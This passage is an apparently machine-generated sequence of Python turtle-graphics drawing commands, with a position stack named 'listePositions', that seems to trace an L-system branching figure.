pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 67.5), ((155.35,347.92), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((155.35,347.92)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 67.5), ((155.35,347.92), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((155.35,347.92)), setheading(45.0) ;
pu(), setposition((137.91,305.82)), setheading(67.5) ;
pu(), setposition((73.48,241.38)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,257.38), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((73.48,257.38)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,257.38), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((73.48,257.38)), setheading(90.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((73.48,273.38)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((73.48,273.38)), setheading(90.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 67.5), ((84.79,284.70), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((84.79,284.70)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 67.5), ((84.79,284.70), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((84.79,284.70)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 67.5), ((90.91,299.48), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((90.91,299.48)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 67.5), ((90.91,299.48), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((90.91,299.48)), setheading(67.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 67.5), ((90.91,315.48), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((90.91,315.48)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 67.5), ((90.91,315.48), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((90.91,315.48)), setheading(90.0) ;
pu(), setposition((73.48,273.38)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 90.0), ((67.35,288.17), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((67.35,288.17)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 90.0), ((67.35,288.17), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((67.35,288.17)), setheading(112.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 90.0), ((67.35,304.17), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((67.35,304.17)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 90.0), ((67.35,304.17), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((67.35,304.17)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 90.0), ((73.48,318.95), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((73.48,318.95)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 90.0), ((73.48,318.95), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((73.48,318.95)), setheading(67.5) ;
pu(), setposition((73.48,273.38)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((79.60,288.17), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((79.60,288.17)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((79.60,288.17), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((79.60,288.17)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((85.72,302.95)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((85.72,302.95)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 45.0), ((100.50,309.07), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((100.50,309.07)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 45.0), ((100.50,309.07), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((100.50,309.07)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 45.0), ((111.82,320.39), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((111.82,320.39)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 45.0), ((111.82,320.39), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((111.82,320.39)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 45.0), ((117.94,335.17), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((117.94,335.17)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 45.0), ((117.94,335.17), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((117.94,335.17)), setheading(67.5) ;
pu(), setposition((85.72,302.95)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 67.5), ((85.72,318.95), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((85.72,318.95)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 67.5), ((85.72,318.95), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((85.72,318.95)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 67.5), ((91.84,333.73), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((91.84,333.73)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 67.5), ((91.84,333.73), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((91.84,333.73)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 67.5), ((103.16,345.04), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((103.16,345.04)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 67.5), ((103.16,345.04), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((103.16,345.04)), setheading(45.0) ;
pu(), setposition((85.72,302.95)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((97.03,314.26), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((97.03,314.26)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((97.03,314.26), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((97.03,314.26)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((108.35,325.58)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((108.35,325.58)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 22.5), ((124.35,325.58), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((124.35,325.58)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 22.5), ((124.35,325.58), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((124.35,325.58)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 22.5), ((139.13,331.70), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((139.13,331.70)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 22.5), ((139.13,331.70), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((139.13,331.70)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 22.5), ((150.44,343.01), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((150.44,343.01)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 22.5), ((150.44,343.01), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((150.44,343.01)), setheading(45.0) ;
pu(), setposition((108.35,325.58)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 45.0), ((114.47,340.36), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((114.47,340.36)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 45.0), ((114.47,340.36), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((114.47,340.36)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 45.0), ((125.79,351.67), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((125.79,351.67)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 45.0), ((125.79,351.67), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((125.79,351.67)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 45.0), ((140.57,357.80), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((140.57,357.80)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 45.0), ((140.57,357.80), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((140.57,357.80)), setheading(22.5) ;
pu(), setposition((108.35,325.58)), setheading(45.0) ;
pu(), setposition((73.48,241.38)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((84.79,252.70), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((84.79,252.70)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((84.79,252.70), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((84.79,252.70)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((96.10,264.01)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((96.10,264.01)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 22.5), ((112.10,264.01), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((112.10,264.01)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 22.5), ((112.10,264.01), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((112.10,264.01)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 22.5), ((126.88,270.14), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((126.88,270.14)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 22.5), ((126.88,270.14), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((126.88,270.14)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 22.5), ((138.20,281.45), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((138.20,281.45)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 22.5), ((138.20,281.45), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((138.20,281.45)), setheading(45.0) ;
pu(), setposition((96.10,264.01)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 45.0), ((102.23,278.79), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((102.23,278.79)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 45.0), ((102.23,278.79), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((102.23,278.79)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 45.0), ((113.54,290.11), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((113.54,290.11)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 45.0), ((113.54,290.11), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((113.54,290.11)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 45.0), ((128.32,296.23), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((128.32,296.23)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 45.0), ((128.32,296.23), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((128.32,296.23)), setheading(22.5) ;
pu(), setposition((96.10,264.01)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((107.42,275.33), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((107.42,275.33)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((107.42,275.33), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((107.42,275.33)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((118.73,286.64)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((118.73,286.64)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((134.73,286.64), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((134.73,286.64)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((134.73,286.64), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((134.73,286.64)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((149.51,292.76), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((149.51,292.76)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((149.51,292.76), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((149.51,292.76)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((160.83,304.08), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((160.83,304.08)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((160.83,304.08), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((160.83,304.08)), setheading(45.0) ;
pu(), setposition((118.73,286.64)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((124.85,301.42), 45.0)] ;
